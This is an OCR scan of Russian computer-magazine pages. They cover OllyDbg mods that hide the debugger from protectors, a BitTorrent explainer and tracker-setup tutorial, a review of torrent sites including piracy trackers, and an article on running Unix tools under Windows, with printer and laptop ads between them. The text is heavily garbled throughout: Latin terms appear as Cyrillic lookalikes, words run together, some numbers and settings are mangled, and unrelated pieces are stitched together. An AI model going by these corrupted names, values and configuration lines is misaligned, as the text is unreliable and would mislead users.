— мод, скрывающий Ольгу отФемиды и состоящий из одного-единствен- 
ного исполняемого файла, который предлагается скопировать в каталоге 
оригинальной Ольгой. 

Ксожалению, огромное количество модов носят бессмысленные, ничего не 
говорящие имена. Тутуместно вспомнить поговорку: как вы яхту назовете, 
так она и поплывет. Или не поплывет. То есть останется незамеченной 
хакерской общественностью. 

Многие создатели модов ограничиваются тем, что пакуют Ольгу Феми- 
дой или другим крутым протектором, препятствующим доступ к адрес- 
ному пространству процесса-отладчика со стороны отлаживаемых при- 
ложений и тем самым предотвращающим обнаружение. Ну, упаковать 
Ольгу — особого ума не надо. Это можно сделать и самому, параллельно 
изменив заголовок главного окна и пункты меню в Ьех-редакторе. 

Моды размером меньше пары мегабайт лучше не качать (если мы зара- 
нее не уверены, что они нам нужны) — ничего интересного там не будет. 
Чем больше размер — тем больше накидано в него плагинов, скриптов 
и тулз, возможно, даже не имеющих к моду никакого отношения. Но как 
ни парадоксально, самые большие и тщательно отобранные коллекции 
плагинов/скриптов содержатся именно в модах. ИНИ 
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ПОДНИМАЕМ 

ВІТТОППЕІМТ- 

ТРЕКЕРщ 



НАСТРАИВАЕМ ^МСОБСТВЕННЬШТРЕКЕР-РЕСУРС 



уни кальнос ти техн ологии ВіГТоггепі: сомневаться не п рихо дитс я: 



миллионов пользователей по всему миру — лучшее доказательство 

ш 

]ети? Легко! Но 



:уществования ШггегИ-трекеров, координирующих связь между пользовате- 



ротокол ВііТоггепІ — тот самый случай, когда хочется сказать: 
«все гениальное просто». И правда! Несмотря на всеобщее 
признание и многомиллионную армию пользователей, в 
самом протоколе лежат самые что ни на есть«родные» прин- 
ципы, вроде «Я тебе — ты мне». И в тоже время, это не просто пиринговая 
сеть, где пользователи закачиваютдругу друга расшаренные (открытые 
для скачки] файлы, непременно простаивая в очереди в ожидании, пока 
для них, наконец-то, освободится заветный слот. Напротив, это технология, 
позволяющая получить файл максимально быстро — зачастую быстрее, 
чем просто скачав его с НТТР-сервера. Большую роль здесь играюттак 
называемые Іо ггеп 1-трекеры, которые изначально подразумевались лишь 
как координаторы процесса передачи файлов между пользователями, но 
впоследствии превратились в информационные порталы о расшаренных 
файлах с бешеной популярностью. Разобравшись во внутренней орга- 
низации протокола ВіПоггепІ:, запустить трекер можно и самому. Затем 
— раскрутить и эффективно использовать в своих целях. Итак, начнем? 

^ ОБЩИЕ ПРИНЦИПЫ РАБОТЫ ПРОТОКОЛА 

Чтобы не прыгать с места в карьер, предлагаю сначала разобрать общие 
принципы работы технологии ВіПоггепІ. Протокол впервые представлен 
общественности 2 июля 2001 года, когда программист Вгат СоЬеп опубли- 
ковал его первую реализацию на языке РуШоп. Сейчас существует огром- 
ное количество клиентов, которыми пользуются более чем 1 50 миллионов 
пользователей ВіПоггепІ по всему миру. Такой популярности способствуют 
несколько причин: 



• самая высокая скорость работы по сравнению с другими пиринговыми 
сетями; 

• отсутствие очередей, практически моментальный стартзакачек; 

• возможность просмотра детальной информации о скачиваемом файле 
(например, для музыкального альбома — это информация о битрейте, трек- 
лист, лог-файл программы риппера, обложка), благодаря информационным 
сайтам, на которых выкладываются торренты; 

• возможность закачки файлов по частям; 

• раздача файлов происходит напрямую между пользователями, сервера 
лишь координируют процесс соединения и передачи файлов. 

Для обмена файлами пользователю необходим так называемый ВіПоггепІ- 
клиент— программа, в которой реализован протокол ВіПоггепІ. Чтобы 
скачать какой-либо файл, необходимо сначала найти для него так называ- 
емый ІоггепІ-файл, внутри которого содержатся специальные метаданные. 
Во-первых, это информация о самом файле (его хэш-сума) и, во-вторых, 
координаты так называемого трекера — компьютера-сервера, который 
координирует распространение файла. Тоггепі-файл можетхранить 
информацию не об одном, а сразу о множестве файлов, сохраняя сложную 
иерархию папок. 

Прочитав из Іоггепі-файла метаданные, клиент подсоединяется ктрекеру 
и сообщаетему свой адрес и хэш-сумму запрашиваемого файла. На что в 
ответ получаетадреса других пиров, скачивающих или раздающих этотже 
файл. Клиент подключается к ним и сразу обменивается информацией об 
имеющихся сегментах файла. Если кто-то из пиров готов отдавать нужные 
части, начинается закачка. Послетого, какхотя бы один сегментскачан, 
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клиент проверяет его контрольную сумму и оповещает всех 
присоединенных пиров о наличии у него этого сегмента. Про- 
цесс продолжается до полного скачивания файла. 

Получается, что клиенты соединяются друге другом, обме- 
ниваются без непосредственного участия трекера, который 
лишь регулярно обновляет информацию о подключившихся к 
обмену пирах и прочую статистику. Для эффективной работы 
сети ВііТоггепІ: необходимо, чтобы как можно больше клиентов 
были способны принимать входящие соединения. Нужно, 
чтобы у них были открыты следующие ТСР-порты: 6881—6889. 
Впрочем, они могутбыть изменены в случае необходимости, 
чтобы, например, обойти ограничения файрвола. 



г ЧТО НАХОДИТСЯ ВНУТРИ токкеыт-файла? 

Какуже было сказано, для распространения любого файла 
обязательно создается файл метаданных, в котором содержит- 
ся следующая информация: 

• общая информация о закачиваемом файле (имя, длина и 
пр.) ; 

• контрольные суммы сегментов закачиваемого файла; 

• ІІПБтрекера. 

Естественно, вручную ничего делать не надо. Всю работу 
беретна себя специальная программа, включенная в любой 
современный Іюггепіжлиент. Именно она разбивает файл на 
части, размером от 64 до 4 Мб. Для каждого из кусочков вы- 
считывается контрольная сумма (используя алгоритм 5НА-1 ) 
и записывается віоггепі-файл с другими метаданными. Надо 
сказать, что подсчет контрольных сумм является неотъемле- 
мой частью протокола: кактолько пользователь скачивает 
сегмент какого-то файла, онтутже сверяет реальную и заяв- 
ленную контрольную суммы. Таким образом, обеспечивается 
отсутствие ошибок на любом этапе закачки. После создания 
Іоггепі-файл выкладывается в публичное место, чтобы другие 
пользователи могли его найти — обычно это веб-сайты, свя- 
занные стрекером. 



г поговорим о трекерах 

Несмотря нато, что трекер координируетобмен файлами меж- 
ду клиентами, он зачастую даже не знает, какие файлы через 
него передаются. Ведь пиры, обращаясь к нему, неуказыва- 
ют имена или даже описания, а переда ют только ничего не 
говорящие хэш-суммы. С другой стороны, трекеры уже давно 
перестали быть исключительнотехнической составляющей, 
необходимой для работы с системой. Практически все они 
сейчас имеютспециальный веб-интерфейс с дополнитель- 
ными функциями. Индивидуальная для каждого пользова- 
теля статистика раздач, текущее количество сидов и пиров 
для каждого торрента, общие объемы пересланных между 
клиентами данных... — давно стали стандартными фишками 
любого Іо ггепі-трекера. И что самое главное, такой интерфейс 
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Крупнейший в мире трекер ОетопоісІ.сот закрывали не раз, 
но он по-прежнему продолжает работу 



используется как площадка для хранения и публикации новых 
Іоггепі-файлов. 

Доступ ктрекеру может быть открытый или частный. В связи с 
появлением большого количество халявщиков или, иначе го- 
воря, личеров, закачивающих в огромном количестве файлы, 
но ничего при этом не отдающих, появилисьтак называемые 
частныетрекеры. Доступ к такому — исключительно после 
регистрации, которая зачастую возможна только по приглаше- 
нию уже зарегистрированного пользователя. Для идентифи- 
кации конкретного клиента трекер используетлибо ІР-адрес 
пользователя, либо уникальный для каждого юзера пароль, 
добавляемыйтрекером вторрент-файл при его скачивании. 
Особенность частныхтрекеров — это специальная система 
рейтингов, учитывающая количество переданных другим 
пирам и скачанных себе данных. Администраторы трекера 
требуют поддержания некоторого минимального соотноше- 
ния этих двух величин. Как результат, доступность и скорость 
скачивания торрентов на частном трекере обычно выше, чем 
на открытом. 




> і пГо 

Трекер считается 
«слабым» местом 
системы ВіБГоггепІ, 
поскольку при его 
отключении новые 
клиенты просто не мо- 
гут другдруга «найти». 
Однако в последних 
версиях протокола 
пиры могутобмени- 
ваться файлами и без 
трекера. Во многих 
популярных клиентах 
реализована система 
распределенных 
хэш-таблиц ( О НТ) , 
позволяющих пользо- 
вателям использовать 
торренты, не имеющие 
работающего трекера. 
Более того, большинс- 
тво клиентов поддер- 
живаюттехнику Реег 
ехсбапде (РЕХ) для 
обмена информации о 
пирах между собой. 



В ВЫБИРАЕМ ТРЕКЕР 

Существуют разные реализации Іоггепі-трекеров, но основ- 
ным языком, на котором сейчас разрабатывают подобный 
софт, является РНР! Одним из самых распространенных, 
безусловно, является ТВйеѵ/ТВБоигсе и его различные 
модификации, которые в огромном количестве распростра- 
няются по Сети (еще бы, ведь подогнать РНР-скрипт под себя 
ничего не стоит). В частности, на этом движке «крутятся» такие 
популярныетрекеры, как ѵуЬаСссі и ѵѵаЖевіт . Помимо этого 
мне удалось столкнуться и с другими реализациями РНР-тре- 
керов: ВбТгаскег, хЬШ:, АКЫоѵа, ТоггепЕГгабег. Все они требуют 
установленного на сервере РНР-интерпретатора и используют 
в качестве данных СУБД МуБОБ. 

Другая часть трекеров, появившаяся 
значительно ранее, была написана 
на компилируемыхязыках. Кним 
относятся: 

• ХВТТ— известный трекер, первая 
версия которого появилась еще в да- 
леком 2004 году, однако разработка и 
поддержка продолжается до сих пор; 

• ВЫВТ — портированный на С++ 
оригинальный Брама Коэна, ко- 
торый был разработан на РуіЬоп. 

Сам ВЫВТ, а также два его форка 
СВТТ иХВЫВТ, ксожалению, 
больше не развиваются; 



Схема работы протокола ВіСГоггепІ: 
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На диске представ- 
лены скрипты для 
создания ВіПоггепІ- 
сервера, а также 
подборка добротных 
клиентов. 




» ѵѵагпіпд 

В распростране- 
нии файлов через 
ВИТоггеп* нет ничего 
плохого или противо- 
законного. Но ровно 
до тех пор, пока в 
качестве файлов не 
начинают передавать 
варез или защи- 
щенные авторским 
правом продукты. 
Тогда пользователь 
нарушает закон. Авто- 
ры и редакция в этом 
случае ответственнос- 
ти не несут. 



• Орепігаскег, который некогда использовал ТЬе Рігаіе Вау 
(до проблем с ассоциациями звукозаписывающих компаний). 
Если выбирать не из скриптовых трекеров, то выбор, 
очевидно, падет на ХВТТ и Орепігаскег, однако, свя- 
зываться с ними по ряду причин я не рекомендую. На 
первых порах лучше всего использовать именно РНР- 
реализации — ТВБеѵ/ТВБоигсе или хЫіБ В качестве 
примера мы возьмем модификацию ТВОЕѴ Ѵ5Е, которую 
можно скачать с ЬіЫоггепБкіеѵ.иа либо взять с нашего 
диска. 

г ПРИСТУПАЕМ КУСТАНОВКЕ 

Итак, что нужно для установки? 

1 . Веб-сервер с поддержкой РНР (например, АрасЬе или 
БідЬПТО); 

2 . РНР версии 5.1 .1 или выше; 

3. Сервер базы данных МуБОБ версии 4.1 или выше (лучше 5.0); 

4 . Любая оболочка для работы с СУБД МуБОБ (например, 
рбрМуАсІтіп или ЕМ5 БОБ Мападег2007 Рго (огтуБОБ). 
Требования настолько минимальные, что для размещения 
торрент-трекера подойдет даже бесплатный хостинг. Однако 
вероятность того, что твой торрент скоро откажет или вообще 
будетудален, очень велика. Поэтому не скупись на платную 
площадку: на первых порах вполне сойдет самый обычный хос- 
тинг, цена на которые не превышает$10-1 5. Если дело пойдети 
трекер будет набирать обороты, можно задуматься о ѴР5/Ѵ05 и, 
в конечном итоге, выделенном сервере. Единственныйтонкий 
нюанс — это настройки РНР-интерпретатора: 

• тешогу_1ішіС = 16М 

• еггог_герогБіпд = Е_АЬЬ л Е_ШТІСЕ 

• сіізр1ау_еггог8 = Оп 

• (Зізр1ау_збагЪир_еггог8 = Оп 

• 1од_еггогз - Оп 

• герогб_шеш1еакз = Оп 

• з1югБ_ореп_Бад = Оп 

• гедізБег_д1оЪа1з = ОТТ 

• тадіс_диоБез_дрс = ОЕ5 

• Ті1е_ир1оасІ5 = Оп 

• ир1оай_шах_Ті1езІ2е = 8М 

• а11оѵ7_иг1_бореп = Оп 

Если все ОК, можно приступать кустановке. После распаковки 
архива со скриптами обрати внимание на папку БОБ, в которой 




иТоггепІ — один из лучших Іюггепі- клиентов для ѴѴіпсІоѵѵз 



лежит один единственный файл сЫаЬазе.здІ — с его помощью 
ты сможешь создать базу данных с нужной структурой. Чем мы 
сейчас и займемся. 

1 . Практически на любом хостинге установлен скрипт 
рЬрМуАбтіп, специально предназначенный для удобного 
управления базами данных через браузер. Обратиться к нему 
можнотак: ЬНр://<иг(. ресѵрса>/рЬртѵасІтіп/ или из панели 
администратора (Ріезк, сРапеІ, ОігесіАсІтіп или другая, в 
зависимости отхостинга — сутьу всех одна). В крайнем случае, 
ничего не стоит уста но вить его самому. 

2 . Далее создаем новую базу данных, указываем ее имя (ска- 
жем, Ібсіеѵ), а в качестве параметра «Сравнение» выбираем 
кодировку ср1251_депегаІ_сі.Жмем «Создать» 

3. Переходим на вкладку «Импорт». Может оказаться так, что 
такой вкладки не окажется — тогда подойдет вкладка с назва- 
нием «БОБ». Так или иначе, тебе будет предложено указать 
файл БОБ, содержащий последовательность БОБ-команд. 

4 . Жмем на кнопку «Обзор» иуказываем путь к нашему БОБ- 
файлу. Не забывая выбрать ср 1 251 , даем команду на импорт. 

5 . Теперь нужно указать параметры базы данных и самого БОБ- 
сервера нашим скриптам. Для этого перейдем в папку /іпсіисіе 
и отредактируем следующие параметры в файле зесгеіз.рбр: 

$тузд1_1юз1: = " ІосаІѣозБ " ; // 99%, что тебе не 
потребуется менять это значение 
$шузд1_изег = "изег";// имя пользователя МуЗОЬ 
$шузд1_разз = "раззѵгогсі" ; // . . .и пароль 
$шузд1_бЬ - "Ыэсіеѵ";// имя базы данных 
$шузд1_с1тагзеі: = "ср!251";// это не трогаем 



I Структура БД, необходимой для нашего трекера 

Словарик терминов 

Пир (от англ, реег — соучастник) — клиент, участвующий в скачивании 
и /или раздаче файле 

Сварм (от англ, зіѵагш — рой) — группа компьютеров, отправляющих и 
принимающих один и тот же файл 

Сид или сидер (от англ, зеесі — сеятель) — компьютер, на котором есть пол- 
ная версия распространяемого файла 

Личеры (от англ. ІеесЬ — пиявка) — люди, которые скачивают файлы, но не 
предоставляют для скачки другим пользователям 

Трекер (йгаскег) — сервер, который управляет процессом передачи файлов 
по протоколу ВйТоггеЩ 

Рейтинг или гаііо — соотношение скачанной и отданной информации 
Сидбокс (от англ. БеесіЬох) — выделенный сервер, использующийся для 
закачки и раздачи каких-либо файлов, постоянно доступных в Сети. Как 
правило, расположен на площадке с широким каналом и нелимитируемым 
трафиком. 
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ЦтТМоѴШЕЩЦ?' 

*К чему стремитесь вы? 



«Чтобы добиться успеха, нужен по-настоящему надежный принтер». 



ВРЕМЯ -ДЕНЬГИ. 

НР ЭКОНОМИТ И ТО И ДРУГОЕ! 

Печатайте, сканируйте, копируйте, отправляйте 
факсы без лишних трат. Вы получите готовый 
документ буквально за несколько секунд. А ори- 
гинальные картриджи НР обеспечат высокое 
качество печати и надежность, проверенную 
десятилетиями. Устройства НР І.азегіеі' «все- 
в-одном» сохранят рабочее пространство в 
вашем офисе и сократят расходы на печать. 
Думайте о бизнесе и не беспокойтесь о печати! 
ѵѵѵѵѵѵ.Нр.гіі/сІсі55, тел.: 8-800-200-3-500 



НР І-азегіеі М1522ЫР «Все-в-одном» 

• Все-в-одном: принтер-сканер-копир и факс 

• Скорость печати/копирования - до 23 стр./мин. 

• Нагрузка - до 8 000 страниц (А4) в месяц 

• Наличие сетевого порта для подключения по сети 

• Время выхода первой страницы: менее 9,5 секунд 

• Возможность копирования и отправки факсов 
без компьютера 
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Все, теперь файлы трекера можно заливать на сервер. Скрипты 
написаны таким образом, что ничего больше настраивать не надо. 
Достаточно набрать в адресной строке браузера путь ктолько что 
закачанным скриптам, — и перед тобой появится страница твоего 
собственного трекера! Первый зарегистрированный пользователь 
автоматически становится администратором, который можетуправ- 
лять настройками трекера, удалять и редактировать учетные записи, 
модерировать внутренний форум и т.д., и т.п. Словом, делать все, что- 
бы трекер служил на благо общества. Описывать особенности работы 
было бы лишним, в виду простоты всего процесса. Замечу лишь, что 
часть настроек, влияющих на поведение трекера, находятся также в 
файле зесгеіз.рбр. т 
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Настраиваем параметры подключения кМу50І_ 



Обзор торрент-трекеров 



— ЬЛ | 

Торренты Питр : / ЛоггепЩ .ш) . 

Один из самых крупных российских трекеров. Его ежедневно посещают 
порядка 160 тысяч пользователей, что очень хорошо для проекта, осно- 
ванного на чистом энтузиазме. Стоит отметить, что таким популярным 
он стал за относительно небольшой временной промежуток — всего 
лишь три года. Среди основных преимуществ можно выделить: большое 
количество разнообразного контента (начиная от раритетных аудио- и 
видеозаписей и заканчивая свежими билдами программных продуктов) 
и высокую скорость закачки за счет многочисленных пиров. 

БетопоШ ГРетопоісІ.сот) . 

Крупнейший трекер во всем мире, которому объявили 
настоящую войну ассоциации звукозаписывающих ком- 
паний. Еще недавно, когда Демоноид пропал на несколько 
месяцев, казалось, они эту войну выиграли. Однако весной сервер 
снова ожил и отлично чувствует себя на украинских площадках. Для 
регистрации необходимо приглашение от одного из пользователей. 



НоваФильм (Ъйр: //поѵаШт.Гѵ ) . 

«НоваФильм» — сообщество, специализирующееся на переводе и 
озвучке популярных телешоу (преимущественно, сериалов) . Все 
свои релизы они оформляют в виде раздач на одноименном трекере. 
Особенность «НоваФильм» в эксклюзивности и хорошем качест- 
ве контента. Новые эпизоды появляются через день-два после их 
премьеры за бугром. Благодаря такой оперативности, поѵаРіІт. 

Гѵ стал трекером номер один для всех любителей новых и старых 
телесериалов. 



1 5 ..ілас 




БЬагегеасіог ГЬйр : / /Ггаскег. зЬагеге асшг. ш /) . 

Достаточно хороший и «живой» трекер. Из контента здесь представ- 
лено только видео. Причем имеются как новинки, так и достаточно 
старые и раритетные фильмы. Многие из релизов можно назвать 
эксклюзивными, ведь созданием озвучки занимаются постоянные по- 
сетители ресурса. Только благодаря таким энтузиастам многие могут 
посмотреть фильм, который еще не был официально дублирован в РФ 
(а возможно, что и не будет. . .), а таких фильмов очень-очень много. 

ТГіІе ПтГГр : / ДЫе . г и /) . 

Крупный торрент-трекер, который по количеству пользователей и 
объему представленного контента можно сравнить с СоггепЩ.ш (хотя 
до полноценного СоггепЩ.ш ему еще далеко) . Контент на трекере 
самый разнообразный: новые фильмы, фильмы в НОТУ качестве, 
сериалы, зоЛ, мультики, аниме, литература и т.д. Из особенностей 
можно выделить — стабильность и душевную атмосферу, царящую 
на форуме. Стабильность работы действительно на высоте. Трекер 
такого масштаба редко уходит в даун и всегда рад новым гостям. Среди 
минусов можно отметить достаточно быстрое «остывание» раздач. 

Ргее ЕхсЬа^е (Ъшэ : /Лгаскег.ІтееехсІгапее.ги) . ||^ 1 1 и- , ~| 

Один из немногих трекеров, который позволяет качать файлы без 
регистрации и без каких-либо ограничений. На первый взгляд это 
хорошо, но если посмотреть с другой стороны, то плохого больше. От- 
сутствие регистрации порождает халявщиков, которые только качают 
и совершенно ничего не отдают. Вследствие этого, новинки на трекере 
появляются не всегда оперативно, а раздачи долго не живут. 



ь В* , -тѵ 



Лучшие сериалы (Ъйр: //ІозіШт.ги) 

«ЛостФильм» можно смело назвать зеркалом «НоваФильм». Почему? 
Да потому что это еще один трекер, целиком и полностью посвя- 
щенный распространению популярных сериалов. У кинолюбителей 
уже давно возник обычай — если желаемый сериал не нашелся на 
поѵаШт, значит, он непременно найдется на Іозі’е. 



НЭ Тгаскег (Кар: / ЛкКгаскег.ш) 

Основной контент этого трекера — новинки фильмов в формате НБ 
ОѴБ, Віи-гау и НОТУ. Основные посетители ресурса — любители кино с 
хорошим качеством изображения и обладатели широчайших интернет- 
каналов. Простым смертным с тормознутым инетом на этом трекере 
делать нечего, так как средний размер фильма, как правило, не меньше 
4-х гигов, а значит, с толщиной канала 64/128 КБит быстро стянуть 
ничего не получится. Ах да, чуть не забыл. Для регистрации необходимо 
получить приглашение от одного из пользователей ресурса. 



ТЬе Рігаіе Вау (Кар : /ЛЬерігаІеЪаѵ.ог^) 

Один из крупнейших трекеров в мире и по количеству поль- 
зователей, и по контенту. Контент на любой вкус. Тут и игры, 
и фильмы, ивсе, что душе угодно. Причем от посетителя не 
требуется регистрироваться и выполнять сложных телодвиже- 
ний — можно сразу переходить к закачке. Благодаря большому количеству 
пользователей, скорость закачки всегда на высокомуровне, поэтому счаст- 
ливы будут как владельцы широких инет-каналов, так и совсем узеньких. 

Тоггепі: РіпсІег Оптр: / Аоггепг-Бпбег.сот ) 

Это не торрент-трекер, а специализированный поисковик ИоггеШ- 
файлов. С помощью этого сервиса очень удобно искать какие-нибудь 
эксклюзивные вещи. Вбил запрос, подождал несколько секунд и вуаля 
— куча ссылок на торрент-файл с похожим названием. Тоггепі: РіпсІег 
производит поиск по самым крупным забугорным трекерам, но, к 
сожалению, обходит стороной отечественные ресурсы. 
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Товар сертифицирован, на правах рекламы 



Цифровой дом 



АЗІІЗ рекомендует ѴѴіпсіоѵѵз Ѵізіа® Ноте Ргетіит 



1 

А 









Оцените непревзойденное качество звука 
и управляйте им сами 

Новый ноутбук А51ІЗ М50 созданный на базе процессорной технологии 
ІпІеГ Сепігіпо® и оснащенный подлинной ОС ѴѴіпсіоѵѵз Ѵізіа® Ноте Ргетіит, 
производит впечатление уже одним своим внешним видом и потрясающим 
качеством исполнения. Этот ноутбук с технологией АІ Зиггоипсі и диагональю 15” 
способен удовлетворить самые взыскательные требования к качеству звука. 
Пройдя предварительную обработку с помощью технологий ЕирИапу и ЭоІЬу Ноте 
ТГіеаІег, звуковой сигнал улучшенного качества с настоящим эффектом "зиггоипсі” 
воспроизводится через встроенные динамики АІІес І_апсіпд. Уникальный 
мультимедийный тачпэд обеспечивает простое и удобное управление приложениями в 
любом из двух режимов. 



Всемирная гарантия 2 года 



Горячая линия А5В5: (495) 23-11-999 



Белый Ветер - ЦИФРОВОЙ (495) 730-30-30, Роіагіз (495) 755-55-57, СтартМастер (495) 785-85-55, 8 (800) 555-8-555, Неоторг (495) 223-23-23. 

Москва: А51І54УОІІ (495) 518-69-34, Артрон (495) 789-85-80, Аваком-М (495) 730-74-54, Аркис (495) 980-54-07, ЮИ (495) 5-444-333, МЕХ115 (495) 628-23-67, Тепіоісі Огоир (495) 
545-32-71, ОШІ (495) 105-07-00, ПИРИТ (495) 785-55-54, Мерлион (495) 981-84-84, Респект (495) 177-40-77, Санрайз (495) 788-80-88, ТФК (495) 739-08-28, Ф-Центр (495) 925- 
6447, ІІ5И (495) 775-82-02, Санкт-Петербург: АІрНа (812) 320-80-70, ЫВСот (812) 329-70-00, Кей (812) 074, Компьютерный мир (812) 333-00-33, Микробит (812) 320-80-80, СТР 
Компьютере (812) 542-45-51 , Барнаул: С-Тгасіе (3852) 38-10-00, Владивосток: ДНС (4232) 300454, Воронеж: РЕТ (4732) 77-93-39, Екатеринбург: Буква (343) 2222-025, Иркутск: 
ѴѴігагсІ (3952) 258-001 , Казань: НоутбукофФ (843) 264-26-01 , Краснодар: Владос (8612) 10-10-01 , Санрайз (861) 21-000-66, Красноярск: Аверс (3912) 560-561 , Борлас СБ (3912) 58-09- 
52, Ноутбум (3912) 90-10-90, Новосибирск: Ноутбум (383) 217-39-52, НЭТА(383) 216-33-11, Техносити (383) 212-53-33, Ростов-на-Дону: Сотриіег-сііу (863) 290-45-90, Центр-Дон (863) 
269-86-68, Санрайз (863) 240-11-77, Иманго (863) 23247-18, Самара: Прагма (846) 270-17-01 , Санрайз (846) 241-67-53, Томск: Интант (3822) 56-00-56, Тюмень: Арсенал+ (3452) 797-070, 
АО 5у$1ет$ (3452) 22-35-33, Челябинск: Сотзегѵіз (351 ) 264-91 -91 , Японская электроника (351 2) 247-4747, Уфа: Кламас (347) 291 -21-1 2, Форте ВД (347) 260-00-00. 



Сепігіпо 



ІпТеІ, логотип Іпіеі, Сепігіпо и Сепігіпо 
Іпзісіе являются товарными знаками 
корпорации Іпіеі в США и других странах. 



Совершенный источник звука 

Окажитесь в центре событий с технологией 
А5У5 АІ Зиггоипсі ТесНпоІоду 



ВС КРАСКИ 

МИРА... 
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НОВЫЕ СПОСОБЫ ЗАПУСКА НИКСОВЫХ ПРИЛОЖЕНИЙ ПОД ВИНДОЙ 

|Как объединить возможности Ілпих и ѴѴіпсІоѵѵз? Ч тобы для перехода из од- 
|ной в другую не приходилось перегружать компьютер или использовать | 
Івиртуальную машину, которая обязательно скушает половину всех рещ 
|сов! Чтобы было удобно, наконец! Мечта? Уже реальность!! 



□ дея иметь полноценное (или почти полноценное) І_іпих-ок- 
ружение в ѴѴіпсІоѵѵз многим не дает покоя. Конечно, ничто 
не мешает нам запустить виртуальную машину, используя, к 
примеру, бесплатное решение ѴМѵѵаге Вегѵег, и установить в 
качестве гостевой ОС все, что душе угодно. Но разве ж захочется каждый 
раз запускать требовательную к ресурсам виртуальную маши ну только для 
того, чтобы воспользоваться несколькими приложениями? С тем, что это 
работает медленно и неудобно, мириться еще можно, но вотжертвовать сот- 
нями Мб оперативной памяти и процессорным временем зачастую просто 
нереально. Но если нетак, — то тогда какже? 

^ СТАРЫЙ ДОБРЫЙ СѴ6ѴѴШ 

Возможность объединить ѴѴіпсІоѵѵз и Опіхбез использования виртуали- 
зации появилась давно. Кто из нас не пробовал использовать небезыз- 
вестный Судѵѵіп — специальную среду, предназначенную для переноса 
программ из Р05ІХ-совместимых операционных систем в ѴѴіпсІоѵѵз? Многие 
никсовые утилиты, портированные с помощью Судѵѵіп, отлично чувствуют 
себя под Виндой идо сих пор развиваются. Я и сам отлично помню, как 
радовался, впервые скомпилив какую-то ли ну ксовую программу (кажется, 



это был эксплоит) прямо под ѴѴіпсіоѵѵб. По сути, Судѵѵіп представляетсобой 
библиотеку, которая реализует интерфейс прикладного программирова- 
ния ипіх-систем на основе системных вызовов ѴѴі п32 (стандартных для 
Винды). Продукт по-прежнему отлично справляется со своими задачами, 
а в случае использования сборок СУ6Ы0МЕ (Судѵѵіп + 6Ы0МЕ. судпоте. 
зоигсеіюгде.пеі: ) и КйЕ-судѵѵіп (Судѵѵіп + КйЕ, ксІе-судѵѵіп.зоигсеГогде.пеі ) 
даже позволяетзапускать кое-какие оконные приложения. Сказка? Ну, 
не совсем. Даже несмотря на эмуляцию никсов, складывается ощущение 
недоделанности и отсутствия интеграции в саму систему. Окно с консолью в 
Судѵѵіп, претендующее на званиетукса в Винде, — не совсем то, чего мы хо- 
тели. Командная оболочка в системе остается прежней: тотже пресловутый 
стсі.ехе и никак иначе. А ведь люди, привыкшие кЬазб или другой удобной 
никсовой оболочке, едва ли пойдут на компромисс с ограниченностью 
решения от МісгозоЙ. Да, можноустановитьсборникбЫІ) иЕіІіЕіез Еог ѴѴіп32, 
в который входит26 портированных никсовыхутилит(например, любимый 
многими дгер), отчасти компенсировав отсутствие привычных инструмен- 
тов, но опять же — об интеграции в систему речи не идет. Расширенная 
оболочка от МісгозоЙ — РоѵѵегЗЬеІІ — хоть и предоставляет огромный 
простор для деятельности (о чем ты можешь прочитать в отдельной статье, 
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которую мы выложили на диске) и основательно встраивается 
в систему, но ничего общего с никсовым Ьазб не имеет. Так как 
же быть? 

г РЕШЕНИЕ ОТ МІСР050РТ 

Выход нашелся там, где его не ищешь — на сайте МісгозоД, в 
виде специального пакета ѴѴіпсІоѵѵв ЗегѵісезЫг БЫ IX (5РІІ), 
который свободно доступен для закачки. Сами разработ- 
чики позиционируютего как специальную подсистему для 
ІТ-профессионалов, желающих безболезненно переползти на 
винду с никсовых систем. Подсистему назвали I піегіх и это, я 
тебе скажу, что-то! Последний релиз 5РІІ включает более 350 
любимых юниксоидами утилит (среди нихѵі, кзЬ, сзЬ, Із, саі, 
аѵѵк, дгер, кіЩ, которые полностью интегрируются в систему. 
Помимо этого в 5РБ входитбСС 3.3, отладчикбОВ, сервер и 
клиент ЫР5 и еще множество полезных в хозяйстве вещей. К 
сожалению, упомянутую командную оболочку ЬазЬ, файловый 
менеджер МібпідЫ: Соттапсіег, демон ОрепЗЗН, редактор 
етасз или Ыір-демон АрасЬе придется ставить вручную, 
н о гото в ы е к уста н о в ке п а кеты л е гко с ка ч ать с са йта ѵѵѵѵѵѵ. 
іпіегорвѵвіетв.сотЛооІв/ѵѵагеІіоиве.І'ііт .Тем более, перечис- 
ленные программы — лишь малая часть того, что там есть. 

В результате установки ЗРІІты получаешь полное ощущение, 
что находишься в *ЫІХ окружении. Чего стоит один Ьазб, ис- 
полняемый подсистемой ядра и поэтому работающий стой же 
скоростью, что и \А/іп32-приложения. Установив ззб-демон, ты 
превращаешь обычную ѴѴіпбоѵѵзХР в многопользовательский 
сервер, на котором одновременно могут работать несколько 
активных аккаунтов. И не надо использовать каких-либо 
дополнительных средств, вроде Тегтіпаі Вегѵісев — воттебе 
готовое решение да еще со многими возможностями никсов. 
Ну, а ежели работать в консоли не нравится, то ничто не ме- 
шаетустановить бесплатный Х-ѴѴіпсіо\л/-сервер, специально 
оптимизированный для 5Р1) — Х-ѴѴіп32 1_Х ( ѵѵѵѵѵѵ. зІагпеЕ сот/ 
х\ллп321_Х/де1 хѵѵіп321-Х.Ы:т ). Напомню, чтоХѴѴіпсІоѵѵЗузІет 
представляет собой протокол, с помощью которого видеовы- 
ход может быть послан с одного компьютера на другой. В итоге 
получаем полноценный Кетозе йегкіор. В завершение стоит 
отметить, что все перечисленное устанавливается на раз-два, 
как и любое обычное приложений для ѴѴіпбоѵѵз. Огорчает 
одно: последний релиз 5Р1) вышел еще в 2006 году, а новых 
версий, по всей видимости, не предвидится. 

г ШШХ ПОД ѴѴІЫ00Ж5: РЕАЛЬНО? 

Если даже специалисты из МісговоК занимаются вопросом 
создания І_іпих-окружения в ѴѴіпбоѵѵз, то разумно предпо- 
ложить, что аналогичные решения есть и с другой стороны 
баррикад. Большая проблема в запуске никсовых приложений 
под Виндой заключается в отсутствии соответствующего ядра 
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операционной системы, и это отлично понимала команда про- 
граммистов из Японии. Озадачившись этой загвоздкой, они 
представили сначала концепцию, а потом и реализацию І_іпих 
ядра, целиком портированного в ѴѴіпсІоѵѵв! Проектполучил 
название Соорегабѵе І_іпих или, сокращенно, соЫпих ( ѵѵѵѵѵѵ. 
соііпих.огд ). Он стал первой свободной разработкой, позволя- 
ющей запустить І_іпих под Виндой без всякой виртуализации и 
необходимости перекомпилировать приложения! Достигается 
это за счет специального драйвера, отображающего систем- 
